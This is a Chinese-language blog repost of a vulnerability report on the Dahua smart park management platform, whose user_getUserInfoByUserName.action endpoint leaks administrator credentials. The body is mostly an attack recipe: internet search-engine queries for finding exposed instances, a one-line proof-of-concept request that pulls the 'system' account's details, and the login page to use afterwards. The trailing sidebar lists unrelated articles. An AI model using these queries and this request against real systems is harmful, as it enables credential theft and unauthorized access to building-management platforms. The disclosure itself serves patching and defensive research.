首页 > 其他分享 >大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞

大华智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞

时间:2023-08-29 09:46:14浏览次数:39  
标签:漏洞 getUserInfoByUserName user action 账号密码 园区

漏洞简介

大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏

漏洞复现

fofa语句:"/WPMS/asset/lib/gridster/"app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"

POC:

/admin/user_getUserInfoByUserName.action?userName=system


获取后访问地址

/admin/login_login.action

标签:漏洞,getUserInfoByUserName,user,action,账号密码,园区
From: https://www.cnblogs.com/pursue-security/p/17663930.html

相关文章

  • 设备驱动-14.userspace进行IP的寄存器读写
    1定义寄存器以键盘keyscan为例,定义一个IP寄存器描述头文件,IOCRREG,IOCWREG定义了两个ioctl命令,用来读写寄存器。structmsg用来存放寄存器地址和值。/*Keyscanregister:addr+offset+mask*/#definekeyscan_top_keyscan_config1 0x0#definekeyscan_top_keyscan_......
  • git总是提示要填账号密码| fatal: Authentication failed for 'http://gitlab.xxx.git
    骑士李四记录:gitclone/gitpull等git操作总是提示要填账号密码问题?执行这段命令:gitconfig--globalcredential.helperstore这个命令则是在你的本地生成一个账号密码的本子记录信息,这样就不用每次都输入了,第一次还是需要输入。......
  • ERROR 1396 (HY000): Operation ALTER USER failed for ‘root‘@‘localhost‘
    1251clientdoesnotsupportauthenticationprotocolrequestedbyserver;considerupgradingMysqlclientERROR1396(HY000):OperationALTERUSERfailedfor'root'@'localhost'先登录mysqlmysql-uroot-p输入密码mysql>usemysql;mysql>......
  • nginx配置auth_basic,要求账号密码的原理
    一、HTTP的身份验证HTTP提供了一个用于权限控制和认证的通用框架。流程如下:1、用户第一次通过客户端访问页面,服务器端向客户端返回401状态码,并在WWW-Authenticate响应头说明验证的信息。2、客户端收到相应后,弹窗让用户输入用户名和密码。3、用户输入后,客户端通过编码或加密的......
  • 什么是敏捷开发项目管理应用 JIRA 里 User Story 的 Story Point 字段
    在敏捷开发项目管理应用JIRA中,UserStory是一种描述需求的方式,而StoryPoint是一个用于估计开发工作量的度量单位。UserStory在敏捷开发中,UserStory是一种简洁、明确的描述软件功能的方式,其主要目的是从用户的视角定义功能,以便开发人员可以更好地理解用户需求,并为其设计......
  • swift--使用UserDefaults来进行本地数据存储
    UserDefaults适合轻量级的本地客户端存储,存储一个值,新值可以覆盖旧值,可以重复存储,也可以存储一次,然后直接从UserDefaults里面读取上次存储的信息,很方便,用的时候,宏定义下,直接调用!轻量级数据库的话,移动端一般使用SQlite数据库,也是一款轻量级的适合移动端设备的数据库,具体可以参考我以......
  • 前端input自动填充账号密码问题处理
    1. autocomplete="off" input添加autocomplete属性2.<formautocomplete="off"> 在表单标签上添加autocomplete="off"属性。有些浏览器可能会尊重表单级别的autocomplete属性。3.最上面增加一个隐藏的表单,自动填充密码会填充在隐藏表单里面具体生效看浏览器自身,可以1,2,3方......
  • java.sql.SQLException: Access denied for user 'root'@'localhost' (using password
    场景:使用mybatis-plus和SpringBoot,用Druid连接,查询数据库时出现异常用户访问被拒绝java.sql.SQLException:Accessdeniedforuser'root'@'localhost'(usingpassword:YES)在application.yml中核对过用户名密码后发现连接数据库密码是正确的,问题出在哪儿呢?appliation.yml......
  • DDPM [diffusers] 保姆级代码解释 (1)
    UNet2DModel整体网络结构block_out_channels:参考UNet的思路,收缩阶段图像空间尺寸在变小但特征通道则增加;扩张阶段则相反。conv_in:对输入的像素空间图像进行卷积处理,获得指定通道且与原始图像相同尺寸的第一层特征图down_blocks:依次对应收缩阶段的模块mid_block:对应中间模......
  • springboot 打包 时报错:The specified user settings file does not exist: F:\opt\
     解决方法:  ......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99